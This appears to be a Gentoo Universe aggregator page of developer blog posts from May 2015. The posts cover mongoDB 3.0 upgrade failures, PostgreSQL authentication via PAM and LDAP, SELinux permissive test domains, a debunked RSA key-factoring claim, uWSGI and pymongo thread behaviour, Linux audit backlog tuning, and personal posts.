
Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
May 27, 2015, 19:06 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

May 26, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In my previous post regarding the migration of our production cluster to mongoDB 3.0 WiredTiger, we successfully upgraded all the secondaries of our replica-sets with decent performance and (almost, read on) no breakage.

Step 2 plan

The next step of our migration was to test our work load on WiredTiger primaries. After all, this is where the new engine would finally demonstrate all its capabilities.

  • We thus scheduled a step down from our 3.0 MMAPv1 primary servers so that our WiredTiger secondaries would take over.
  • Not migrating the primaries was a safety net in case something went wrong… And boy it went so wrong we’re glad we played it safe that way!
  • We rolled back after 10 minutes of utter bitterness.

The failure

After all the wait and expectation, I can’t express our level of disappointment at work when we saw that the WiredTiger engine could not handle our work load. Our application immediately started throwing 50 to 250 WriteConflict errors per minute!

Turns out that we are affected by this bug and that, of course, we’re not the only ones. So far it seems to affect collections with:

  • heavy insert / update work loads
  • a unique index (or compound index)
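
For illustration, such writes can be wrapped in a small retry helper on the client side; this is only a minimal sketch, assuming the conflict surfaces to the application as a pymongo OperationFailure with error code 112 (WriteConflict), and the database, collection and query below are made up:

# Hedged sketch: retry a write when a WriteConflict (error code 112) surfaces,
# assuming pymongo 3 raises it as an OperationFailure. Names below are made up.
import time
from pymongo import MongoClient
from pymongo.errors import OperationFailure

WRITE_CONFLICT = 112

def update_with_retry(collection, query, update, retries=5, delay=0.05):
    for attempt in range(retries):
        try:
            return collection.update_one(query, update, upsert=True)
        except OperationFailure as exc:
            if exc.code != WRITE_CONFLICT or attempt == retries - 1:
                raise
            time.sleep(delay * (attempt + 1))  # simple linear backoff

client = MongoClient()
coll = client.mydb.mycollection  # hypothetical database/collection
update_with_retry(coll, {"_id": 42}, {"$inc": {"counter": 1}})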

The breakages

We also discovered that we’re affected by a weird new mongodump behaviour where the dumped BSON file does not contain the number of documents that mongodump said it was exporting. This is clearly a new problem because it happened right after all our secondaries switched to WiredTiger.
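
One way to detect that kind of silent inconsistency is to count the documents actually present in the dumped BSON file and compare the result with what mongodump reported. A minimal sketch using the bson package that ships with pymongo (the file path is made up):

# Hedged sketch: count the documents actually stored in a mongodump BSON file,
# using the bson package shipped with pymongo. The path below is made up.
import bson

def count_dumped_documents(path):
    with open(path, "rb") as handle:
        return sum(1 for _ in bson.decode_file_iter(handle))

print(count_dumped_documents("/backup/mydb/mycollection.bson"))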

Since we have to ensure strong consistency of our exports, and the mongoDB guys don’t seem so keen on moving on the bug (which I can surely understand), there is a strong possibility that we’ll have to roll back even the WiredTiger secondaries altogether.

Not to mention that since the move to 3.0, we have been experiencing CPU overloads that crash the entire server on our MMAPv1 primaries, which we’re still trying to tackle before opening another JIRA bug…

Sad panda

Of course, any new major release such as 3.0 brings its share of headaches and bugs. We were ready for this, hence the safety steps we took to ensure that we could roll back on any problem.

But as a long-time advocate of mongoDB I must admit my frustration, all the more after the time it took to get 3.0 out and all the expectations that came with it.

I hope I can share some better news on the next blog post.

May 25, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)

I have been running a PostgreSQL cluster for a while as the primary backend for many services. The database system is very robust, well supported by the community and very powerful. In this post, I’m going to show how I use central authentication and authorization with PostgreSQL.

Centralized management is an important principle whenever deployments become very dispersed. For authentication and authorization, having a highly available LDAP is one of the more powerful components in any architecture. It isn’t the only method though – it is also possible to use a distributed approach where the master data is centrally managed, but the proper data is distributed to the various systems that need it. Such a distributed approach allows for high availability without the need for a highly available central infrastructure (user ids, group membership and passwords are distributed to the servers rather than queried centrally). Here, I’m going to focus on a mixture of both methods: central authentication for password verification, and distributed authorization.

PostgreSQL defaults to in-database credentials

By default, PostgreSQL uses in-database credentials for the authentication and authorization. When a CREATE ROLE (or CREATE USER) command is issued with a password, it is stored in the pg_catalog.pg_authid table:

postgres# select rolname, rolpassword from pg_catalog.pg_authid;
    rolname     |             rolpassword             
----------------+-------------------------------------
 postgres_admin | 
 dmvsl          | 
 johan          | 
 hdc_owner      | 
 hdc_reader     | 
 hdc_readwrite  | 
 hadoop         | 
 swift          | 
 sean           | 
 hdpreport      | 
 postgres       | md5c127bc9fc185daf0e06e785876e38484

Authorizations are also stored in the database (and unless I’m mistaken, this cannot be moved outside):

postgres# \l db_hadoop
                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    |     Access privileges     
-----------+-----------+----------+------------+------------+---------------------------
 db_hadoop | hdc_owner | UTF8     | en_US.utf8 | en_US.utf8 | hdc_owner=CTc/hdc_owner  +
           |           |          |            |            | hdc_reader=c/hdc_owner   +
           |           |          |            |            | hdc_readwrite=c/hdc_owner

Furthermore, PostgreSQL has some additional access controls through its pg_hba.conf file, in which the access towards the PostgreSQL service itself can be governed based on context information (such as originating IP address, target database, etc.).

For more information about the standard setups for PostgreSQL, definitely go through the official PostgreSQL documentation as it is well documented and kept up-to-date.

Now, for central management, in-database settings become more difficult to handle.

Using PAM for authentication

The first step to move the management of authentication and authorization outside the database is to look at a way to authenticate users (password verification) outside the database. I tend not to use a distributed password approach (where a central component is responsible for changing passwords on multiple targets), instead relying on a highly available LDAP setup, but with local caching (to catch short-lived network hiccups) and local password use for last-hope accounts (such as root and admin accounts).

PostgreSQL can be configured to directly interact with an LDAP, but I like to use Linux PAM whenever I can. For my systems, it is a standard way of managing the authentication of many services, so the same goes for PostgreSQL. And with the sys-auth/pam_ldap package, integrating multiple services with LDAP is a breeze. So the first step is to have PostgreSQL use PAM for authentication. This is handled through its pg_hba.conf file:

# TYPE  DATABASE        USER    ADDRESS         METHOD          [OPTIONS]
local   all             all                     md5
host    all             all     all             pam             pamservice=postgresql

This will have PostgreSQL use the postgresql PAM service for authentication. The PAM configuration is thus in /etc/pam.d/postgresql. In it, we can either directly use the LDAP PAM modules, or use the SSSD modules and have SSSD work with LDAP.

Yet, this isn’t sufficient. We still need to tell PostgreSQL which users can be authenticated – the users need to be defined in the database (just without password credentials because that is handled externally now). This is done together with the authorization handling.

Users and group membership

Every service on the systems I maintain has dedicated groups in which for instance its administrators are listed. For instance, for the PostgreSQL services:

# getent group gpgsqladmin
gpgsqladmin:x:413843:swift,dmvsl

A local batch job (run through cron) queries this group (which I call the masterlist), as well as which users in PostgreSQL are assigned the postgres_admin role (which is a superuser role like postgres and is used as the intermediate role to assign to administrators of a PostgreSQL service), known as the slavelist. Deltas between the two are then used to add or remove users.

# Note: membersToAdd / membersToRemove / _psql are custom functions
#       so do not vainly search for them on your system ;-)
for member in $(membersToAdd ${masterlist} ${slavelist}) ; do
  _psql "CREATE USER ${member} LOGIN INHERIT;" postgres
  _psql "GRANT postgres_admin TO ${member};" postgres
done

for member in $(membersToRemove ${masterlist} ${slavelist}) ; do
  _psql "REVOKE postgres_admin FROM ${member};" postgres
  _psql "DROP USER ${member};" postgres
done
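
For the curious, the same delta logic can be expressed as a self-contained Python sketch; this assumes psycopg2 (2.7 or later, for the psycopg2.sql module) and reuses the group and role names from above, but it is only an illustration, not the script I actually run:

# Hedged sketch of the delta logic above in Python, assuming psycopg2 >= 2.7.
# Group and role names match the example; adapt them to your environment.
import grp
import psycopg2
from psycopg2 import sql

GROUP = "gpgsqladmin"      # the LDAP-provided group (masterlist)
ROLE = "postgres_admin"    # the intermediate PostgreSQL role (slavelist)

masterlist = set(grp.getgrnam(GROUP).gr_mem)

conn = psycopg2.connect(dbname="postgres")
conn.autocommit = True
cur = conn.cursor()

# Current members of the postgres_admin role
cur.execute("""
    SELECT m.rolname
      FROM pg_auth_members am
      JOIN pg_roles r ON r.oid = am.roleid
      JOIN pg_roles m ON m.oid = am.member
     WHERE r.rolname = %s
""", (ROLE,))
slavelist = set(row[0] for row in cur.fetchall())

for member in masterlist - slavelist:
    cur.execute(sql.SQL("CREATE USER {} LOGIN INHERIT").format(sql.Identifier(member)))
    cur.execute(sql.SQL("GRANT {} TO {}").format(sql.Identifier(ROLE), sql.Identifier(member)))

for member in slavelist - masterlist:
    cur.execute(sql.SQL("REVOKE {} FROM {}").format(sql.Identifier(ROLE), sql.Identifier(member)))
    cur.execute(sql.SQL("DROP USER {}").format(sql.Identifier(member)))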

The postgres_admin role is created whenever I create a PostgreSQL instance. Likewise, for databases, a number of roles are added as well. For instance, for the db_hadoop database, the hdc_owner, hdc_reader and hdc_readwrite roles are created with the right set of privileges. Users are then granted this role if they belong to the right group in the LDAP. For instance:

# getent group gpgsqlhdc_own
gpgsqlhdc_own:x:413850:hadoop,johan,christov,sean

With this simple approach, granting users access to a database is a matter of adding the user to the right group (like gpgsqlhdc_ro for read-only access to the Hadoop related database(s)) and either waiting for the cron job to pick it up, or manually running the authorization synchronization. By standardizing on infrastructural roles (admin, auditor) and data roles (owner, rw, ro), managing multiple databases is a breeze.

May 23, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hello!

The Troisdorfer Linux User Group (TroLUG for short) is holding a Gentoo workshop aimed at advanced users

on Saturday, 01.08.2015
in Troisdorf near Köln/Bonn.

More details, the exact address and the schedule can be found on the corresponding TroLUG page.

Regards,

 

Sebastian

Alexys Jacob a.k.a. ultrabug (homepage, bugs)

Good news for gevent users blocked on python < 2.7.9 due to broken SSL support since python upstream dropped the private API _ssl.sslwrap that eventlet was using.

This issue was starting to get old and problematic since GLSA 2015-0310, but I’m happy to say that almost 6 hours after the gevent-1.0.2 release, it is already available in portage!

We were also affected by this issue at work, so I’m glad that the tension this issue was causing between ops and devs will finally be over ;)

May 22, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Three new quotes to the database (May 22, 2015, 18:19 UTC)

Today I added three new quotes to the “My Favourite Quotes” database that you see on the right-hand side of my blog.

“The evil people of the world would have little impact without the sheep.”
–Tim Clark

“Apologising does not always mean that you’re wrong and the other person is right. It just means that you value your relationship more than your ego.”
–Unknown

“Some day soon, perhaps in forty years, there will be no one alive who has ever known me. That’s when I will be truly dead – when I exist in no one’s memory. I thought a lot about how someone very old is the last living individual to have known some person or cluster of people. When that person dies, the whole cluster dies, too, vanishes from the living memory. I wonder who that person will be for me. Whose death will make me truly dead?”
–Irvin D. Yalom in Love’s Executioner and Other Tales of Psychotherapy

The first one came up during a conversation that I was having with a colleague who is absolutely brilliant. That quote in particular sums up a very simplistic idea, but one that would have a dramatic impact on human existence if we were to recognise our sometimes blind following of others.

Cheers,
Zach

May 20, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Late last night, I decided to apply some needed updates to my personal mail server, which is running Gentoo Linux (OpenRC) with a mail stack of Postfix & Dovecot with AMaViS (filtering based on SpamAssassin, ClamAV, and Vipul’s Razor). After applying the updates, and restarting the necessary components of the mail stack, I ran my usual test of sending an email from one of my accounts to another one. It went through without a problem.

However, I realised that it isn’t a completely valid test to send an email from one internal account to another because I have amavisd configured to not scan anything coming from my trusted IPs and domains. I noticed several hundred mails in the queue when I ran postqueue -p, and they all had notices similar to:

status=deferred (delivery temporarily suspended:
connect to 127.0.0.1[127.0.0.1]:10024: Connection refused)

That indicated to me that it wasn’t a problem with Postfix (and I knew it wasn’t a problem with Dovecot, because I could connect to my accounts via IMAP). Seeing as amavisd is running on localhost:10024, I figured that that is where the problem had to be. A lot of times, when there is a “connection refused” notification, it is because no service is listening on that port. You can test to see what ports are in a listening state and what processes, applications, or daemons are listening by running:

netstat -tupan | grep LISTEN

When I did that, I noticed that amavisd wasn’t listening on port 10024, which made me think that it wasn’t running at all. That’s when I ran into the strange part of the problem: the init script output:

# /etc/init.d/amavisd start
* WARNING: amavisd has already been started
# /etc/init.d/amavisd stop
The amavisd daemon is not running                [ !! ]
* ERROR: amavisd failed to start

So, apparently it is running and not running at the same time (sounds like a Linux version of Schrödinger’s cat to me)! It was obvious, though, that it wasn’t actually running (which could be verified with ‘ps -elf | grep -i amavis’). So, what to do? I tried manually removing the PID file, but that actually just made matters a bit worse. Ultimately, this combination is what fixed the problem for me:

sa-update
/etc/init.d/amavisd zap
/etc/init.d/amavisd start

It seems that the SpamAssassin rules file had gone missing, and that was causing amavisd to not start properly. Manually updating the rules file (with ‘sa-update’) regenerated it, and then I zapped amavisd completely, and lastly restarted the daemon.

Hope that helps anyone running into the same problem.

Cheers,
Zach

Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
GNOME Asia 2015 (May 20, 2015, 08:08 UTC)

I was in Depok, Indonesia last week to speak at GNOME Asia 2015. It was a great experience — the organisers did a fantastic job and as a bonus, the venue was incredibly pretty!

View from our room

My talk was about the GNOME audio stack, and my original intention was to talk a bit about the APIs, how to use them, and how to choose which to use. After the first day, though, I felt like a more high-level view of the pieces would be more useful to the audience, so I adjusted the focus a bit. My slides are up here.

Nirbheek and I then spent a couple of days going down to Yogyakarta to cycle around, visit some temples, and sip some fine hipster coffee.

All in all, it was a week well spent. I’d like to thank the GNOME Foundation for helping me get to the conference!

Sponsored by GNOME!

May 19, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, it was that time of the year again this past weekend–time for the 2015 St. Louis Children’s Hospital Make Tracks for the Zoo race! This race is always one of my favourite ones of the year, so I was excited to partake in it. There’s always a great turnout (~3500 this year, I believe, but 1644 chipped for the 5K run), and lots of fun, family-oriented activities. One of the best parts is that there are people of all ages, and walks of life (pun intended) who show up to either walk or run to support the amazing Saint Louis Zoo!


2015 St. Louis Make Tracks for the Zoo – Pre-race

It started out a little iffy this year because there was some substantial rain. Ultimately, though, the rain cleared and the sun started shining in time for the race. The only downside was that the course was pretty slick due to the rain. Despite the slippery course, I did better than expected in terms of time. My total 5K time was 19’06”, according to the chip-timing provided by Big River Running Company (which is a great local running store here in the Saint Louis area). You can see the full results, and sort by whatever criteria you would like by visiting their ChronoTrack site for this race.


2015 St. Louis Make Tracks for the Zoo results

There were some great runners this year! My time earned me 13th overall, 11th among overall males, and 3rd in my bracket (which is now Male 30-34 [ugh, can't believe I turned 30 this month]). Some really outstanding participants (besides the obvious overall winners) this year were Zachary Niemeyer, who at 14 finished 15th overall with a great time of 19’10”, and Norman Jamieson, who at age 79 finished in just over 33 minutes! I’ll be lucky to be able to walk at that age! :-)


Me, tired and sweaty from the humidity, but happy with the experience

So, it was another great year for Make Tracks (especially since it was the 30th year for it), and I’m already looking forward to next year’s race. Hopefully you’ll come and join in a fun time that supports a great establishment!

Cheers,
Zach

P.S. A special thanks to my Pops for not only coming out to support me, but also for snapping the photos above!

May 18, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Testing with permissive domains (May 18, 2015, 11:40 UTC)

When testing out new technologies or new setups, not having (proper) SELinux policies can be a nuisance. Not only is the number of SELinux policies available through the standard repositories limited, some of these policies are not even written with the level of confinement that an administrator might expect. Or perhaps the technology to be tested is used in a completely different manner.

Without proper policies, any attempt to start such a daemon or application might or will cause permission violations. In many cases, developers or users then tend to disable SELinux enforcement so that they can continue playing with the new technology. And why not? After all, policy development is to be done after the technology is understood.

But putting the entire system in permissive mode is overkill. It is much easier to start with a very simple policy and then mark the domain as a permissive domain. The software, after transitioning into this “simple” domain, is then no longer subject to SELinux enforcement, whereas the rest of the system remains in SELinux enforcing mode.

For instance, create a minuscule policy like so:

policy_module(testdom, 1.0)

type testdom_t;
type testdom_exec_t;
init_daemon_domain(testdom_t, testdom_exec_t)

Mark the executable for the daemon as testdom_exec_t (after building and loading the minuscule policy):

~# chcon -t testdom_exec_t /opt/something/bin/daemond

Finally, tell SELinux that testdom_t is to be seen as a permissive domain:

~# semanage permissive -a testdom_t

When finished, don’t forget to remove the permissive bit (semanage permissive -d testdom_t) and unload/remove the SELinux policy module.

And that’s it. If the daemon is now started (through a standard init script) it will run as testdom_t and everything it does will be logged, but not enforced by SELinux. That might even help in understanding the application better.

May 17, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr: News about a broken 4096 bit RSA key is not true. It is just a faulty copy of a valid key.

Earlier today a blog post claiming the factoring of a 4096 bit RSA key was published and quickly made it to the top of Hacker News. The key in question was the PGP key of a well-known Linux kernel developer. I already commented on Hacker News why this is most likely wrong, but I thought I'd write up some more details. To understand what is going on I have to explain some background both on RSA and on PGP keyservers. This by itself is pretty interesting.

RSA public keys consist of two values called N and e. The N value, called the modulus, is the interesting one here. It is the product of two very large prime numbers. The security of RSA relies on the fact that these two numbers are secret. If an attacker were able to gain knowledge of these numbers, he could use them to calculate the private key. That's the reason why RSA depends on the hardness of the factoring problem. If someone can factor N he can break RSA. For all we know today factoring is hard enough to make RSA secure (at least as long as there are no large quantum computers).

Now imagine you have two RSA keys, but they have been generated with bad random numbers. They are different, but one of their primes is the same. That means we have N1=p*q1 and N2=p*q2. In this case RSA is no longer secure, because calculating the greatest common divisor (GCD) of two large numbers can be done very fast with the Euclidean algorithm, so one can recover the shared prime value.
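
A toy example makes this concrete. Here is a small Python sketch with deliberately tiny primes (real RSA primes are hundreds of digits long, but the arithmetic is exactly the same):

# Toy illustration of the shared-factor attack with tiny primes.
from math import gcd

p, q1, q2 = 101, 103, 107   # pretend these are secret primes
N1 = p * q1                 # first public modulus
N2 = p * q2                 # second public modulus, sharing the factor p

shared = gcd(N1, N2)        # Euclid's algorithm, fast even for huge numbers
print(shared, N1 // shared) # recovers p and q1, so the first key is broken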

It is not only possible to break RSA keys if you have two keys with one shared factor, it is also possible to take a large set of keys and find shared factors between them. In 2012 Arjen Lenstra and his team published a paper using this attack on large scale key sets and at the same time Nadia Heninger and a team at the University of Michigan independently also performed this attack. This uncovered a lot of vulnerable keys on embedded devices, but these were mostly SSH and TLS keys. Lenstra's team however also found two vulnerable PGP keys. For more background you can watch this 29C3 talk by Nadia Heninger, Dan Bernstein and Tanja Lange.

PGP keyservers have been around for quite some time and they have a property that makes them especially interesting for this kind of research: They usually never delete anything. You can add a key to a keyserver, but you cannot remove it, you can only mark it as invalid by revoking it. Therefore using the data from the keyservers gives you a large set of cryptographic keys.

Okay, so back to the news about the supposedly broken 4096 bit key: There is a service called Phuctor where you can upload a key and it'll check it against a set of known vulnerable moduli. This service identified the supposedly vulnerable key.

The key in question has the key id e99ef4b451221121 and belongs to the master key bda06085493bace4. Here is the vulnerable modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82913ff626efddfb f8ae8f1d40da8d13 a90138686884bad1 9db776bb4812f7e3 b288b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

In fact this modulus is easily factorable, because it can be divided by 3. However if you look at the master key bda06085493bace4 you'll find another subkey with this modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82c37b8cca2eb4ac 1e889d1027bc1ed6 664f3877cd7052c6 db5567a3365cf7e2 c688b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

You may notice that these look pretty similar. But they are not the same. The second one is the real subkey, the first one is just a copy of it with errors.

If you run a batch GCD analysis on the full PGP key server data you will find a number of such keys (Nadia Heninger has published code to do a batch GCD attack). I don't know how they appear on the key servers; I assume they are produced by network errors, hard disk failures or software bugs. It may also be that someone just created them in some experiment.

The important thing is: Everyone can generate a subkey to any PGP key and upload it to a key server. That's just the way the key servers work. They don't check keys in any way. However these keys should pose no threat to anyone. The only case where this could matter would be a broken implementation of the OpenPGP key protocol that does not check if subkeys really belong to a master key.

However you won't be able to easily import such a key into your local GnuPG installation. If you try to fetch this faulty sub key from a key server GnuPG will just refuse to import it. The reason is that every sub key has a signature that proves that it belongs to a certain master key. For those faulty keys this signature is obviously wrong.

Now here's my personal tie-in to this story: Last year I started a project to analyze the data on the PGP key servers. And at some point I thought I had found a large number of vulnerable PGP keys – including the key in question here. In a rush I wrote a mail to all people affected. Only later did I find out that something was not right, and I wrote to all affected people again apologizing. Most of the keys I thought I had found were just faulty keys on the key servers.

The code I used to parse the PGP key server data is public; I also wrote a background paper and did a talk at the BsidesHN conference.

May 14, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, sometimes there is a mistake so blatantly obvious on a website that it just has to be shared with others. I was looking at the Material Safety Data Sheets from Exxon Mobil (don’t ask; I was just interested in seeing the white paper on Mobil jet oil), and I noticed something rather strange in the drop-down menu:




Yup, apparently now Africa is a country. Funny, all this time I thought it was a continent. Interestingly enough, you can see that they did list Angola and Botswana as countries. Countries within countries—either very meta, or along the lines of country-ception (oh the double entendre), but I digress…

Cheers,
Zach

May 13, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
uWSGI, gevent and pymongo 3 threads mayhem (May 13, 2015, 14:56 UTC)

This is a quick heads-up post about a behaviour change when running a gevent based application using the new pymongo 3 driver under uWSGI and its gevent loop.

I was naturally curious about testing this brand new and major update of the python driver for mongoDB, so I just played it dumb: update and give it a try on our existing code base.

The first thing I noticed is that a vast majority of our applications were suddenly unable to reload gracefully and were force-killed by uWSGI after some time!

worker 1 (pid: 9839) is taking too much time to die...NO MERCY !!!

uWSGI’s gevent-wait-for-hub

All our applications must be able to be gracefully reloaded at any time. Some of them spawn quite a few greenlets on their own, so as an added measure to make sure we never lose any running greenlet we use the gevent-wait-for-hub option, which is described as follows:

wait for gevent hub's death instead of the control greenlet

… which does not mean a lot by itself, but is explained in a previous uWSGI changelog:

During shutdown only the greenlets spawned by uWSGI are taken in account,
and after all of them are destroyed the process will exit.

This is different from the old approach where the process wait for
ALL the currently available greenlets (and monkeypatched threads).

If you prefer the old behaviour just specify the option gevent-wait-for-hub

pymongo 3

Compared to its previous 2.x versions, one of the key aspects of the new pymongo 3 driver is its intensive use of threads to handle server discovery and connection pools.

Now we can relate this very fact to the gevent-wait-for-hub behaviour explained above:

the process wait for ALL the currently available greenlets
(and monkeypatched threads)

This explains why our applications were hanging until the reload-mercy (force kill) timeout of uWSGI kicked in!

conclusion

When using pymongo 3 with the gevent-wait-for-hub option, you have to keep in mind that all of pymongo’s threads (which are monkey-patched threads) are considered active greenlets and will thus be waited on for termination before uWSGI recycles the worker!

Two options come to mind to handle this properly:

  1. stop using the gevent-wait-for-hub option and change your code to use a gevent pool group to make sure that all of your important greenlets are taken care of when a graceful reload happens (this is how we do it today; the gevent-wait-for-hub option was just over-protective for us). A minimal sketch of this approach follows the list below.
  2. modify your code to properly close all your pymongo connections on graceful reloads.
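
As an illustration of the first option, here is a minimal sketch of tracking your own greenlets in a gevent pool group so that only they are waited for on a graceful reload; the worker function and its names are made up:

# Hedged sketch of option 1: keep your own greenlets in a gevent Group so a
# graceful reload only deals with the greenlets you actually care about.
# The worker function and its names are illustrative only.
import gevent
from gevent.pool import Group

workers = Group()

def background_worker(name):
    while True:
        # ... do the actual periodic work here ...
        gevent.sleep(1)

workers.spawn(background_worker, "stats-flusher")
workers.spawn(background_worker, "cache-warmer")

def shutdown():
    # call this from your application's shutdown path on graceful reload
    workers.kill(timeout=5)  # stop and wait for our own greenlets only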

Hope this will save some people the trouble of debugging this ;)

May 10, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Audit buffering and rate limiting (May 10, 2015, 12:18 UTC)

Be it because of SELinux experiments or through general audit experiments, sometimes you’ll run into a message similar to the following:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

The message shows up when certain audit events could not be logged through the audit subsystem. Depending on the system configuration, they might be either ignored, sent through the kernel logging infrastructure or even have the system panic. And if the messages are sent to the kernel log then they might show up, but even that log has its limitations, which can lead to output similar to the following:

__ratelimit: 53 callbacks suppressed

In this post, I want to give some pointers in configuring the audit subsystem as well as understand these messages…

There is auditd and kauditd

If you take a look at the audit processes running on the system, you’ll notice that (assuming Linux auditing is used of course) two processes are running:

# ps -ef | grep audit
root      1483     1  0 10:11 ?        00:00:00 /sbin/auditd
root      1486     2  0 10:11 ?        00:00:00 [kauditd]

The /sbin/auditd daemon is the user-space audit daemon. It registers itself with the Linux kernel audit subsystem (through the audit netlink system), which responds with spawning the kauditd kernel thread/process. The fact that the process is a kernel-level one is why the kauditd is surrounded by brackets in the ps output.

Once this is done, audit messages are communicated through the netlink socket to the user-space audit daemon. For the detail-oriented people amongst you, look for the kauditd_send_skb() method in the kernel/audit.c file. Now, generated audit event messages are not directly relayed to the audit daemon – they are first queued in a sort-of backlog, which is where the backlog-related messages above come from.

Audit backlog queue

In the kernel-level audit subsystem, a socket buffer queue is used to hold audit events. Whenever a new audit event is received, it is logged and prepared to be added to this queue. Adding to this queue can be controlled through a few parameters.

The first parameter is the backlog limit. Be it through a kernel boot parameter (audit_backlog_limit=N) or through a message relayed by the user-space audit daemon (auditctl -b N), this limit will ensure that a queue cannot grow beyond a certain size (expressed in the amount of messages). If an audit event is logged which would grow the queue beyond this limit, then a failure occurs and is handled according to the system configuration (more on that later).

The second parameter is the rate limit. When more audit events are logged within a second than set through this parameter (which can be controlled through a message relayed by the user-space audit system, using auditctl -r N) then those audit events are not added to the queue. Instead, a failure occurs and is handled according to the system configuration.

